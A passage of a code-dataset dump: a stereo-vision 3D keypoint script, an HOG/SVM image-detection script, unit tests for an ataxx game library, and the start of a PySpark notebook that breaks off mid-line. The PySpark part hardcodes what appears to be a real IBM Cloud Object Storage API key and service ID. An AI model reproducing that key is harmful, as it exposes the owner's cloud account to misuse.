list(zip(mkp1, mkp2))\r\n    return mi, p1, p2, list(kp_pairs)\r\n\r\ndef calibrate_match_points(T, pts1, pts2):\r\n    dx, dy, dz = T.ravel()\r\n\r\n    if dz != 0:\r\n        logging.info(\"Warning: there is a depth offset; the results may contain errors\")\r\n        return\r\n\r\n    if dx != 0 and dy != 0:\r\n        logging.info(\"Offsets in both the horizontal and vertical directions; no pixel calibration performed\")\r\n        return\r\n\r\n    if dx == 0:\r\n        logging.info(\"Vertical offset only; performing horizontal pixel calibration\")\r\n        # pts2[:, 0] = pts1[:, 0]\r\n        dt = np.mean(pts2 - pts1, axis=0)\r\n        pts2[:, 0] -= dt[0]\r\n\r\n    elif dy == 0:\r\n        logging.info(\"Horizontal offset only; performing vertical pixel calibration\")\r\n        # pts2[:, 1] = pts1[:, 1]\r\n        dt = np.mean(pts2 - pts1, axis=0)\r\n        pts2[:, 1] -= dt[1]\r\n\r\ndef calculate_points3d(K, T, pts1, pts2):\r\n    '''Compute the corresponding 3D spatial coordinates from the pinhole\r\n    camera model and the matched pixel coordinates of two images. The\r\n    reference frame is the camera coordinate system whose origin is the\r\n    shooting position of the first photo: straight ahead of the camera is\r\n    Z, downward is the Y axis, and rightward is the X axis.\r\n\r\n    K is the camera intrinsic matrix; both images are assumed to be taken\r\n    with the same camera.\r\n\r\n    t is the offset of the second image; for example, if the second image\r\n    was taken 5cm to the right of and 10cm in front of the first one,\r\n    then t = (-5, 0, -10)\r\n\r\n    pts1, pts2 are the matched pixel coordinates of the two images.\r\n\r\n    >>> t = np.float32([-4, 0, 0])\r\n    >>> K = np.float32([[2380, 0, 1223], \\\r\n                        [0, 2380, 1631], \\\r\n                        [0, 0, 1]])\r\n    >>> pts1 = np.float32([[1226., 1237.], \\\r\n                           [1097., 375.]])\r\n    >>> pts2 = np.float32([[1188.,1234.8], \\\r\n                           [1058.40002441, 373.20001221]])\r\n    >>> pt3d = [[   0.31874507,  -41.58947622,  250.5377471 ], \\\r\n                [ -13.05410563, -130.24889215,  246.64372768]]\r\n    >>> calculate_points3d(K, t, pts1, pts2)\r\n    [array([   0.3214155 ,  -41.45054333,  249.68944372]), array([ -13.02433003, -129.96615533,  246.09709895])]\r\n\r\n    '''\r\n    fx, fy = K[0][0], K[1][1]\r\n    cx, cy = K[0][2], K[1][2]\r\n    cp = np.array([K[0][2], K[1][2]])\r\n    dx, dy, dz = T.ravel()\r\n\r\n    n = pts1.shape[0]\r\n\r\n    b1 = np.zeros(2 * n).reshape(-1, 2)\r\n    b2 = ( pts2 - cp ) * dz - np.array([fx * dx, fy * dy])\r\n    b = np.hstack((b1, b2))\r\n\r\n    a0 = np.array([[fx, 0], [0, fy]] * n)\r\n    a1 = np.hstack((a0, (-pts1 + np.array([cx, cy])).reshape(-1, 1))).reshape(-1, 2, 3)\r\n    a2 = np.hstack((a0, (-pts2 + np.array([cx, cy])).reshape(-1, 1))).reshape(-1, 2, 3)\r\n    a = np.stack((a1, a2), axis=1).reshape(-1, 4, 3)\r\n    return [np.linalg.lstsq(a[i], b[i])[0] for i in range(n)]\r\n\r\ndef calculate_points3d_by_y(K, T, pts1, pts2):\r\n    fx, fy = K[0][0], K[1][1]\r\n    cx, cy = K[0][2], K[1][2]\r\n    cp = np.array([K[0][2], K[1][2]])\r\n    dx, dy, dz = T.ravel()\r\n\r\n    n = pts1.shape[0]\r\n\r\n    b1 = np.zeros(2 * n).reshape(-1, 2)\r\n    b2 = ( pts2 - cp ) * dz - np.array([fx * dx, fy * dy])\r\n    b = np.hstack((b1, b2))\r\n\r\n    a0 
= np.array([[fx, 0], [0, fy]] * n)\r\n    a1 = np.hstack((a0, (-pts1 + np.array([cx, cy])).reshape(-1, 1))).reshape(-1, 2, 3)\r\n    a2 = np.hstack((a0, (-pts2 + np.array([cx, cy])).reshape(-1, 1))).reshape(-1, 2, 3)\r\n    a = np.stack((a1, a2), axis=1).reshape(-1, 4, 3)\r\n    # Drop the third equation\r\n    a = np.delete(a, 2, axis=1)\r\n    b = np.delete(b, 2, axis=1)\r\n    return [np.linalg.lstsq(a[i], b[i])[0] for i in range(n)]\r\n\r\ndef make_models(config, kp1, desc1, kp2, desc2):\r\n    flann_params = dict(algorithm = FLANN_INDEX_LSH,\r\n                       table_number = 6, # 12\r\n                       key_size = 12,     # 20\r\n                       multi_probe_level = 1) #2\r\n    matcher = cv2.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)\r\n\r\n    raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2\r\n    logging.info('KFLANN match count: %s', len(raw_matches))\r\n\r\n    mi, p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches)\r\n    logging.info('Match count after filtering: %s', len(kp_pairs))\r\n    # p1 = cv2.KeyPoint_convert(kp_pairs[0])\r\n    # p1 = cv2.KeyPoint_convert(kp_pairs[1])\r\n\r\n    H, status = None, None\r\n    if len(p1) >= 4:\r\n        if config.homography:\r\n            H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 3.0)\r\n            logging.info('Match count after Homography filtering: %s', np.count_nonzero(status))\r\n        elif config.fundamental:\r\n            H, status = cv2.findFundamentalMat(p1, p2)\r\n            logging.info('Match count after Fundamental filtering: %s', np.count_nonzero(status))\r\n    if status is None:\r\n        status = np.ones(len(kp_pairs), np.bool_)\r\n\r\n    pts1 = np.float64([kpp[0].pt for kpp, flag in zip(kp_pairs, status) if flag])\r\n    pts2 = np.float64([kpp[1].pt for kpp, flag in zip(kp_pairs, status) if flag])\r\n\r\n    w, h = [int(x) for x in config.size.split(',')]\r\n    T = np.float64([float(x) for x in config.refpos.split(',')])\r\n    fx, fy = [float(x) for x in config.focals.split(',')]\r\n    cx, cy = (w-1)/2, (h-1)/2\r\n\r\n    # change by devecor\r\n    # previous:\r\n    # K = np.float64([[w*fx, 0, cx],\r\n    #                 [0, h*fy, cy],\r\n    #                 [0, 0, 1]])\r\n    if config.intrinsicMatrix is None:\r\n        K = np.float64([[w*fx, 0, cx],\r\n                        [0, h*fy, cy],\r\n                        [0, 0, 1]])\r\n    else:\r\n        f_x, f_y, c_x, c_y = [float(i) for i in config.intrinsicMatrix.split(',')]\r\n        K = np.float64([[f_x, 0, c_x],\r\n                        [0, f_y, c_y],\r\n                        [0, 0, 1]])\r\n    # changes over ----by devecor\r\n\r\n    if config.myself:\r\n        # Calibrate the matched points\r\n        # For a horizontal offset, set the matched points' vertical pixels equal in both photos\r\n        # For a vertical offset, set the matched points' horizontal pixels equal in both photos\r\n        # calibrate_match_points(T, pts1, pts2)\r\n        pt3s = calculate_points3d(K, T, pts1, pts2)\r\n    else:\r\n        E, mask = cv2.findEssentialMat(pts1, pts2, K)\r\n        retval, R, t, mask = cv2.recoverPose(E, pts1, pts2, K)\r\n        distCoeffs = np.zeros(4)\r\n        P1, P2, Q = stereo_rectify(K, distCoeffs, K, distCoeffs, (h, w), R, T)\r\n        pt3s = triangulate_points(P1, P2, pts1.T, pts2.T).reshape(-1, 3)\r\n\r\n    if config.save:\r\n        output = '' if config.output is None else config.output \r\n        oname = os.path.splitext(os.path.basename(config.image[0]))[0]\r\n        filename = os.path.join(output, oname.rsplit('-', 1)[0])\r\n        # Filter out 3D points whose z is below 0 or unusually large (>config.maximum)\r\n        status3 = np.ones(len(pt3s))\r\n        for i in range(len(pt3s)):\r\n            if pt3s[i][2] < 0:\r\n                status3[i] = 0\r\n            elif pt3s[i][2] > config.maximum:\r\n                status3[i] = 0\r\n        kps = [kpp[0] for kpp, flag in zip(kp_pairs, status) if flag]\r\n        des = [desc1[m.queryIdx] for m, flag in zip(mi, status) if flag]\r\n        kps = [k for k, flag in zip(kps, status3) if flag]\r\n        des = [d for d, flag in zip(des, status3) if flag]\r\n        pts = [p for p, flag in zip(pt3s, status3) if flag]\r\n        n = len(pts)\r\n        logging.info(\"Saving the 3D coordinates of the computed keypoints (%s in total) to file: %s\", n, 
filename)\r\n        pose = np.zeros(4) if config.pose is None else np.array([float(x) for x in config.pose.split(',')])\r\n        save_model_data(filename, kps, des, pts, np.array([fx, fy]), pose)\r\n        rname = os.path.splitext(os.path.basename(config.refimage[0]))[0]\r\n        filename = os.path.join(output, \"model-%s-%s.txt\" % (oname, rname))\r\n        with open(filename, \"w\") as f:\r\n            f.write(\"%-16s %-16s %-10s\\n\" % (oname, rname, n))\r\n        # for i in range(len(pts)):\r\n        #     pt = kps[i].pt\r\n        #     print(\"%d: (%d, %d) -> (%8.2f %8.2f %8.2f)\" %( i, pt[0], pt[1], pts[i][0], pts[i][1], pts[i][2]))\r\n\r\n    if config.show:\r\n        logging.info(\"The computed 3D coordinate information is as follows:\")\r\n        _u, index = np.unique(pts1, axis=0, return_index=True)\r\n        j = 0\r\n        for i in index:\r\n            if pt3s[i][2] < 0:\r\n                logging.info('%-4d %s, %s: %s', j, np.int32(pts1[i]), np.int32(pts2[i]), \"invalid result\")\r\n            elif pt3s[i][2] > config.maximum:\r\n                logging.info('%-4d %s, %s: %s(%8.2f)', j, np.int32(pts1[i]), np.int32(pts2[i]), \"too far away\", pt3s[i][2])\r\n            else:\r\n                logging.info('%-4d %s, %s: %s', j, np.int32(pts1[i]), np.int32(pts2[i]), pt3s[i])\r\n            j += 1\r\n\r\ndef main(params=None):\r\n    parser = argparse.ArgumentParser(description='Generate a 3D feature point file for an image')\r\n    parser.add_argument('image', metavar='IMAGE', nargs=1, help='keypoint feature file of the image')\r\n    parser.add_argument('refimage', metavar='REFIMAGE', nargs=1, help='keypoint feature file of the reference image')\r\n    parser.add_argument('--pose', help='position of the image x,y,z,a')\r\n    parser.add_argument('--refpos', help='relative offset of the reference image shooting position dx,dy,dz')\r\n    parser.add_argument('--size', required=True, help='image size w,h')\r\n    parser.add_argument('--show', action='store_true', help='print the 3D information of the extracted keypoints')\r\n    parser.add_argument('--save', action='store_true', help='save the 3D keypoint data')\r\n    parser.add_argument('--myself', action='store_true', help='use our own algorithm to compute the 3D coordinates')\r\n    parser.add_argument('--output', metavar=\"path\", help='path for output files')\r\n    parser.add_argument('--homography', action='store_true', help='filter with Homography')\r\n    parser.add_argument('--fundamental', action='store_true', help='filter matches with the fundamental matrix')\r\n    parser.add_argument('--focals', metavar=\"fx,fy\", help='camera intrinsics (fx,fy)')\r\n    parser.add_argument('--maximum', metavar=\"D\", type=int, default=3000, help='maximum 3D keypoint distance, in centimeters')\r\n    # add by devecor\r\n    parser.add_argument('-K', '--intrinsicMatrix', metavar='fx,fy,cx,cy', default=None, help='intrinsic matrix; if this is given, --focals is ignored')\r\n    # add end ----devecor\r\n    args = parser.parse_args(params)\r\n\r\n    for filename in args.image + args.refimage:\r\n        if not os.path.exists(filename):\r\n            logging.info('Input file %s does not exist', filename)\r\n            return\r\n\r\n    kp1, des1 = load_keypoint_data(args.image[0])\r\n    kp2, des2 = load_keypoint_data(args.refimage[0])\r\n    make_models(args, kp1, des1, kp2, des2)\r\n\r\nif __name__ == '__main__':\r\n    # Unit tests\r\n    # python -m doctest -v make_model.py\r\n\r\n    logging.basicConfig(format='%(message)s', level=logging.INFO)\r\n    # HUAWEI SLA00 FOCAL: 0.9722,0.7292 size: 2448,3264\r\n    # HUAWEI G80 FOCAL: 1.15,0.85\r\n    # IPHONE 6S FOCAL: 1.167,0.875 size: 3024,4032\r\n    main()\r\n","sub_path":"src/single/make_model.py","file_name":"make_model.py","file_ext":"py","file_size_in_byte":12775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"73166136","text":"\"\"\" Description here\n\nAuthor: Leonard Berrada\nDate: 20 Jan 2016\n\"\"\"\n\nimport numpy as np\nfrom PIL import Image\nimport cPickle as pickle\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n\nfrom detection_utils import HOG2, plot_polygon, generate_square, save_mat\n\nmy_file = 
\"./pics/leo.jpg\"\n\nmy_array = np.array(Image.open(my_file))\nif my_array.ndim > 2:\n my_array = np.max(my_array, axis=2)\nmy_mat = np.array(my_array, dtype=np.uint8)\n\nsvm_model = pickle.load(open('svm_model.p', 'rb'))\n\nscales = [0.5, 0.25, 0.125]\n(h_original, v_original) = np.shape(my_mat)\n\nsquares = []\nm = -10.\n\nfor scale in scales:\n step = int(v_original * scale / 8)\n size = min(int(h_original * scale), int(v_original * scale))\n i = 0\n while i + size <= h_original:\n j = 0\n while j + size <= v_original:\n hogg = HOG2(my_mat[i:i + size, j:j + size])\n score = float(svm_model.decision_function(hogg))\n if score > 0.5:\n print(score)\n squares.append(generate_square(i, j, size, size))\n save_mat(my_mat[i:i + size, j:j + size])\n if score > m:\n m = score\n j += step\n i += step\n\n# cv2.imshow('frame', frame)\nprint(\"Best score : %.2f\" % m)\nfor square in squares:\n plot_polygon(square)\nplt.imshow(my_mat, cmap = cm.Greys_r)\nplt.show()","sub_path":"src/py/deprecated/3/bootstrapping.py","file_name":"bootstrapping.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65657831","text":"import ataxx\nimport ataxx.players\nimport ataxx.pgn\nimport random\nimport string\nimport copy\nimport unittest\n\nclass TestMethods(unittest.TestCase):\n def test_fen(self):\n fens = [\n \"x5o/7/7/7/7/7/o5x x 0 1\",\n \"x5o/7/2-1-2/7/2-1-2/7/o5x o 0 1\",\n \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x 0 1\",\n \"x5o/7/3-3/2-1-2/3-3/7/o5x o 0 1\"\n ]\n\n for fen in fens:\n board = ataxx.Board(fen)\n self.assertTrue(board.get_fen() == fen)\n\n fens = [\n \"\",\n \"a x 0 1\",\n \"x5o/7/7/7/7/7/o5x a 0 1\",\n \"x5o/7/7/7/7/7/o5x x a 1\",\n \"x5o/7/7/7/7/7/o5x x 0 a\",\n \"x5o/7/7/7/7/7/o5x x 0 1 a\",\n \"x5o/7/7/7/7/7/o5x x -5 1\",\n \"x5o/7/7/7/7/7/o5x x 0 -5\"\n ]\n\n for fen in fens:\n board = ataxx.Board()\n self.assertTrue(board.set_fen(fen) != True)\n\n def test_perft(self):\n positions = [\n {\"fen\": \"7/7/7/7/7/7/7 x\", \"nodes\": [1, 0, 0, 0, 0]},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x\", \"nodes\": [1, 16, 256, 6460, 155888]},\n {\"fen\": \"x5o/7/2-1-2/7/2-1-2/7/o5x o\", \"nodes\": [1, 14, 196, 4184, 86528]},\n {\"fen\": \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x\", \"nodes\": [1, 14, 196, 4100, 83104]},\n {\"fen\": \"x5o/7/3-3/2-1-2/3-3/7/o5x o\", \"nodes\": [1, 16, 256, 5948, 133264]},\n {\"fen\": \"7/7/7/7/2-----/2-----/2--x1o x\", \"nodes\": [1, 1, 0, 0, 0]},\n {\"fen\": \"7/7/7/7/2-----/2-----/2--x1o o\", \"nodes\": [1, 1, 0, 0, 0]},\n ]\n\n depth = 4\n for position in positions:\n fen = position[\"fen\"]\n board = ataxx.Board(fen)\n for idx, nodes in enumerate(position[\"nodes\"]):\n if idx > depth:\n break\n self.assertTrue(board.perft(idx) == nodes)\n\n def test_single_double(self):\n fens = [\n \"x5o/7/7/7/7/7/o5x x\",\n \"x5o/7/2-1-2/7/2-1-2/7/o5x o\",\n \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x\",\n \"x5o/7/3-3/2-1-2/3-3/7/o5x o\"\n ]\n\n for fen in fens:\n board = ataxx.Board(fen)\n for move in board.legal_moves():\n self.assertTrue(move.is_single() != move.is_double())\n\n def test_from_san(self):\n fens = [\n \"x5o/7/7/7/7/7/o5x x\",\n \"x5o/7/2-1-2/7/2-1-2/7/o5x o\",\n \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x\",\n \"x5o/7/3-3/2-1-2/3-3/7/o5x o\"\n ]\n\n for fen in fens:\n board = ataxx.Board(fen)\n for move in board.legal_moves():\n self.assertTrue(ataxx.Move.from_san(str(move)) == move)\n\n def test_null_move(self):\n nullmove = ataxx.Move.null()\n\n self.assertTrue(nullmove == ataxx.Move(-1, -1, -1, -1))\n 
self.assertTrue(nullmove == ataxx.Move.null())\n self.assertTrue(nullmove != ataxx.Move(0, 0, 0, 0))\n self.assertTrue(str(nullmove) == \"0000\")\n\n board1 = ataxx.Board()\n board2 = ataxx.Board()\n\n # Make the null move\n board2.makemove(nullmove)\n\n pieces1, turn1, halfmoves1, _ = board1.get_fen().split(\" \")\n pieces2, turn2, halfmoves2, _ = board2.get_fen().split(\" \")\n\n # Check changes made\n self.assertTrue(pieces1 == pieces2)\n self.assertTrue(turn1 != turn2)\n self.assertTrue(int(halfmoves1)+1 == int(halfmoves2))\n\n def test_single_equality(self):\n nums = [0,1,2,3,4,5,6]\n squares = [[f,r] for f in nums for r in nums]\n\n for sq_to in squares:\n a, b, c, d = sq_to + sq_to\n move1 = ataxx.Move(a, b, c, d)\n\n for sq_from in squares:\n a, b, c, d = sq_from + sq_to\n move2 = ataxx.Move(a, b, c, d)\n\n if move2.is_single():\n self.assertTrue(move1 == move2)\n elif move2.is_double():\n self.assertTrue(move1 != move2)\n\n def test_set_get(self):\n nums = [0,1,2,3,4,5,6]\n squares = [[f,r] for f in nums for r in nums]\n board = ataxx.Board(\"empty\")\n\n for x, y in squares:\n for piece in [ataxx.BLACK, ataxx.WHITE, ataxx.GAP, ataxx.EMPTY]:\n board.set(x, y, piece)\n self.assertTrue(piece == board.get(x, y))\n\n def test_main_line(self):\n for _ in range(10):\n history = []\n\n # Play random moves on the board\n board1 = ataxx.Board(\"startpos\")\n while not board1.gameover() and len(history) < 50:\n moves = board1.legal_moves()\n move = random.choice(moves)\n board1.makemove(move)\n history.append(move)\n\n # Replay the moves on a new board\n board2 = ataxx.Board(\"startpos\")\n for move in board1.main_line():\n board2.makemove(move)\n\n self.assertTrue(board1.main_line() == history)\n self.assertTrue(board1.get_fen() == board2.get_fen())\n\n def test_players(self):\n positions = [\n {\"fen\": \"x5o/7/7/7/7/7/o5x x\", \"moves\": [\"f1\", \"f2\", \"g2\", \"a6\", \"b6\", \"b7\"]},\n {\"fen\": \"x5o/7/2-1-2/7/2-1-2/7/o5x o\", \"moves\": [\"a2\", \"b1\", \"b2\", \"g6\", \"f6\", \"f7\"]},\n {\"fen\": \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x\", \"moves\": [\"f1\", \"f2\", \"g2\", \"a6\", \"b6\", \"b7\"]},\n {\"fen\": \"x5o/7/3-3/2-1-2/3-3/7/o5x o\", \"moves\": [\"a2\", \"b1\", \"b2\", \"g6\", \"f6\", \"f7\"]},\n {\"fen\": \"7/3o3/7/3x3/7/7/7 x\", \"moves\": [\"c5\", \"d5\", \"e5\"]},\n {\"fen\": \"3o3/7/7/3x3/7/7/7 x\", \"moves\": [\"d4c6\", \"d4d6\", \"d4e6\"]},\n {\"fen\": \"3o3/7/3x3/3x3/7/7/7 x\", \"moves\": [\"c6\", \"d6\", \"e6\"]},\n {\"fen\": \"o4oo/7/x5x/7/7/7/7 x\", \"moves\": [\"f6\", \"g6\"]},\n {\"fen\": \"7/3o3/7/3x3/7/7/3oo2 x\", \"moves\": [\"d4d2\", \"d4e2\"]},\n {\"fen\": \"7/7/7/7/7/7/7 x\", \"moves\": [\"0000\"]}\n ]\n\n for position in positions:\n fen = position[\"fen\"]\n moves = position[\"moves\"]\n\n # Greedy player\n board = ataxx.Board(fen)\n for _ in range(100):\n move = ataxx.players.greedy(board)\n self.assertTrue(str(move) in moves)\n\n def test_make_undo(self):\n fens = [\n \"x5o/7/7/7/7/7/o5x x 0 1\",\n \"x5o/7/2-1-2/7/2-1-2/7/o5x o 0 1\",\n \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x 0 1\",\n \"x5o/7/3-3/2-1-2/3-3/7/o5x o 0 1\",\n \"7/3o3/7/3x3/7/7/3oo2 x 0 1\"\n ]\n\n for fen in fens:\n board = ataxx.Board(fen)\n\n while not board.gameover() and board.halfmove_clock < 500:\n current_fen = board.get_fen()\n\n # Test all legal moves\n for move in board.legal_moves():\n board.makemove(move)\n board.undo()\n self.assertTrue(board.get_fen() == current_fen)\n\n # Test null move\n board.makemove(ataxx.Move.null())\n board.undo()\n self.assertTrue(board.get_fen() == 
current_fen)\n\n # Pick a random move and keep going\n move = random.choice(board.legal_moves())\n board.makemove(move)\n\n # Undo every move in the game\n while board.main_line():\n board.undo()\n\n # Make sure we're back where we started\n self.assertTrue(board.get_fen() == fen)\n\n def test_pgn(self):\n def random_phrase(n):\n return ''.join(random.choices(string.ascii_uppercase + string.ascii_lowercase + string.punctuation + string.digits + \" \", k=n))\n\n pgns = [\n \"[Event \\\"Example 1\\\"]\\n[Black \\\"Player 1\\\"]\\n[White \\\"Player 2\\\"]\\n[UTCDate \\\"1970.01.01\\\"]\\n[UTCTime \\\"00:00:00\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x\\\"]\\n[Result \\\"*\\\"]\\n\\n1. a7c5 a2 2. g2 *\",\n \"[Event \\\"Example 2\\\"]\\n[Black \\\"Player 1\\\"]\\n[White \\\"Player 2\\\"]\\n[UTCDate \\\"1970.01.01\\\"]\\n[UTCTime \\\"00:00:00\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x\\\"]\\n[Result \\\"*\\\"]\\n\\n1. a7c5 { Test 123 } 1... a2 { Test } 2. g2 *\",\n \"[Event \\\"Example 3\\\"]\\n[Black \\\"Player 1\\\"]\\n[White \\\"Player 2\\\"]\\n[UTCDate \\\"1970.01.01\\\"]\\n[UTCTime \\\"00:00:00\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x\\\"]\\n[Result \\\"*\\\"]\\n\\n1. a7c7 (1. a7c5 { Test }) 1... g7f5 (1... a2 { Test } 2. g2 (2. f2 { Test })) 2. g1f3 a1b3 { Test 123 } *\",\n \"[Event \\\"Example 4\\\"]\\n[Black \\\"Player 1\\\"]\\n[White \\\"Player 2\\\"]\\n[UTCDate \\\"1970.01.01\\\"]\\n[UTCTime \\\"00:00:00\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x\\\"]\\n[Result \\\"*\\\"]\\n\\n1. a7c7 { Test } (1. a7c5 { Test }) 1... g7f5 (1... a2 { Test } 2. g2 (2. f2 { Test } 2... a1c2)) 2. g1f3 a1b3 { Test 123 } *\"\n ]\n\n # Test some known pgn strings\n for pgn in pgns:\n self.assertTrue(str(ataxx.pgn.parse(pgn)) == pgn)\n\n # Try parse some random games\n # These won't have variations or comments in them\n for _ in range(10):\n board = ataxx.Board()\n while not board.gameover() and board.halfmove_clock < 500:\n move = ataxx.players.random_move(board)\n board.makemove(move)\n\n pgn = ataxx.pgn.Game()\n pgn.headers[\"Event\"] = random_phrase(12)\n pgn.headers[\"Black\"] = random_phrase(12)\n pgn.headers[\"White\"] = random_phrase(12)\n pgn.headers[\"FEN\"] = ataxx.FEN_STARTPOS\n pgn.headers[\"Result\"] = board.result()\n pgn.from_board(board)\n\n # Human readable pgn string\n pgn_string = str(pgn)\n\n # Test: pgn string ---> pgn ---> pgn string\n self.assertTrue(str(ataxx.pgn.parse(pgn_string)) == pgn_string)\n\n # Check the pgn main line matches the board\n moves = [n.move for n in pgn.main_line()]\n self.assertTrue(moves == board.main_line())\n\n # Create a pgn ourselves\n game = ataxx.pgn.Game()\n game.headers[\"FEN\"] = ataxx.FEN_STARTPOS\n game.headers[\"Result\"] = \"*\"\n node = game.add_variation(ataxx.Move.from_san(\"g2\"), comment=\"First move\")\n node = node.add_variation(ataxx.Move.from_san(\"a1a3\"), comment=\"Second move\")\n self.assertTrue(str(game) == \"[Event \\\"Example\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x 0 1\\\"]\\n[Result \\\"*\\\"]\\n\\n1. 
g2 { First move } a1a3 { Second move } *\")\n\n def test_result(self):\n positions = [\n {\"fen\": \"x5o/7/7/7/7/7/o5x x\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x o\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/2-1-2/7/2-1-2/7/o5x x\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/2-1-2/7/2-1-2/7/o5x o\", \"result\": \"*\"},\n {\"fen\": \"x6/7/7/7/7/7/7 x\", \"result\": \"1-0\"},\n {\"fen\": \"x6/7/7/7/7/7/7 o\", \"result\": \"1-0\"},\n {\"fen\": \"o6/7/7/7/7/7/7 x\", \"result\": \"0-1\"},\n {\"fen\": \"o6/7/7/7/7/7/7 o\", \"result\": \"0-1\"},\n {\"fen\": \"1xxxxxx/xxxxxxx/xxxxxxx/xxxxooo/ooooooo/ooooooo/ooooooo x\", \"result\": \"*\"},\n {\"fen\": \"1xxxxxx/xxxxxxx/xxxxxxx/xxxxooo/ooooooo/ooooooo/ooooooo o\", \"result\": \"*\"},\n {\"fen\": \"1oooooo/ooooooo/ooooooo/ooooxxx/xxxxxxx/xxxxxxx/xxxxxxx x\", \"result\": \"*\"},\n {\"fen\": \"1oooooo/ooooooo/ooooooo/ooooxxx/xxxxxxx/xxxxxxx/xxxxxxx o\", \"result\": \"*\"},\n {\"fen\": \"xxxxxxx/xxxxxxx/xxxxxxx/xxxxooo/ooooooo/ooooooo/ooooooo x\", \"result\": \"1-0\"},\n {\"fen\": \"xxxxxxx/xxxxxxx/xxxxxxx/xxxxooo/ooooooo/ooooooo/ooooooo o\", \"result\": \"1-0\"},\n {\"fen\": \"ooooooo/ooooooo/ooooooo/ooooxxx/xxxxxxx/xxxxxxx/xxxxxxx x\", \"result\": \"0-1\"},\n {\"fen\": \"ooooooo/ooooooo/ooooooo/ooooxxx/xxxxxxx/xxxxxxx/xxxxxxx o\", \"result\": \"0-1\"},\n {\"fen\": \"7/7/7/7/7/7/7 o\", \"result\": \"1/2-1/2\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x 99 0\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x 100 0\", \"result\": \"1/2-1/2\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x 0 400\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x 0 401\", \"result\": \"1/2-1/2\"},\n ]\n\n for position in positions:\n fen = position[\"fen\"]\n result = position[\"result\"]\n board = ataxx.Board(fen)\n\n # Check the result is right\n self.assertTrue(board.result() == result)\n\n # Check that if we double pass (null move) we get a decisive result\n if result == \"*\":\n board.makemove(ataxx.Move.null())\n board.makemove(ataxx.Move.null())\n self.assertTrue(board.result() != \"*\")\n\n def test_counters(self):\n positions = [\n {\"move\": \"g1f3\", \"fen\": \"x5o/7/7/7/5x1/7/o6 o 1 1\"},\n {\"move\": \"a1c1\", \"fen\": \"x5o/7/7/7/5x1/7/2o4 x 2 2\"},\n {\"move\": \"b6\", \"fen\": \"x5o/1x5/7/7/5x1/7/2o4 o 0 2\"},\n {\"move\": \"c1e3\", \"fen\": \"x5o/1x5/7/7/4oo1/7/7 x 0 3\"},\n {\"move\": \"0000\", \"fen\": \"x5o/1x5/7/7/4oo1/7/7 o 1 3\"},\n ]\n\n board = ataxx.Board();\n\n for position in positions:\n move = position[\"move\"]\n fen = position[\"fen\"]\n\n board.makemove(ataxx.Move.from_san(move))\n\n self.assertTrue(board.get_fen() == fen)\n\n def test_draws(self):\n # Check nullmove draw conditions\n board = ataxx.Board()\n board.makemove(ataxx.Move.null())\n board.makemove(ataxx.Move.null())\n self.assertTrue(board.gameover())\n self.assertFalse(board.fifty_move_draw())\n self.assertFalse(board.max_length_draw())\n\n # Check double move draw conditions\n board = ataxx.Board()\n for i in range(500):\n if i < 50:\n self.assertFalse(board.gameover())\n self.assertFalse(board.fifty_move_draw())\n self.assertFalse(board.max_length_draw())\n elif i < 400:\n self.assertTrue(board.gameover())\n self.assertTrue(board.fifty_move_draw())\n self.assertFalse(board.max_length_draw())\n else:\n self.assertTrue(board.gameover())\n self.assertTrue(board.fifty_move_draw())\n self.assertTrue(board.max_length_draw())\n\n if i % 2 == 0:\n board.makemove(ataxx.Move.from_san(\"g1g3\"))\n board.makemove(ataxx.Move.from_san(\"a1a3\"))\n else:\n 
board.makemove(ataxx.Move.from_san(\"g3g1\"))\n board.makemove(ataxx.Move.from_san(\"a3a1\"))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":14542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"342643552","text":" \r\nimport ibmos2spark\r\nimport os\r\nimport sys\r\nfrom pyspark.sql import DataFrame\r\nfrom pyspark.sql import functions as F\r\nfrom pyspark.sql.types import IntegerType \r\n# @hidden_cell\r\ncredentials = {\r\n 'endpoint': 'https://s3-api.us-geo.objectstorage.service.networklayer.com',\r\n 'service_id': 'iam-ServiceId-483acb8d-7120-4eae-a2be-d4f9e0af1b6d',\r\n 'iam_service_endpoint': 'https://iam.cloud.ibm.com/oidc/token',\r\n 'api_key': 'jb7eGpeGsDq4s_rDX_cymC3745z3_3wbACksaxigtwcv'\r\n}\r\n\r\nconfiguration_name = 'os_592857e215ab4400b1f0cfeeddc12484_configs'\r\ncos = ibmos2spark.CloudObjectStorage(sc, credentials, configuration_name, 'bluemix_cos')\r\n\r\nfrom pyspark.sql import SparkSession\r\nspark = SparkSession.builder.getOrCreate()\r\n#Testing \r\ndf = spark.read\\\r\n .format('org.apache.spark.sql.execution.datasources.csv.CSVFileFormat')\\\r\n .option('header', 'true')\\\r\n .load(cos.url('Fb_testdata_model.csv', 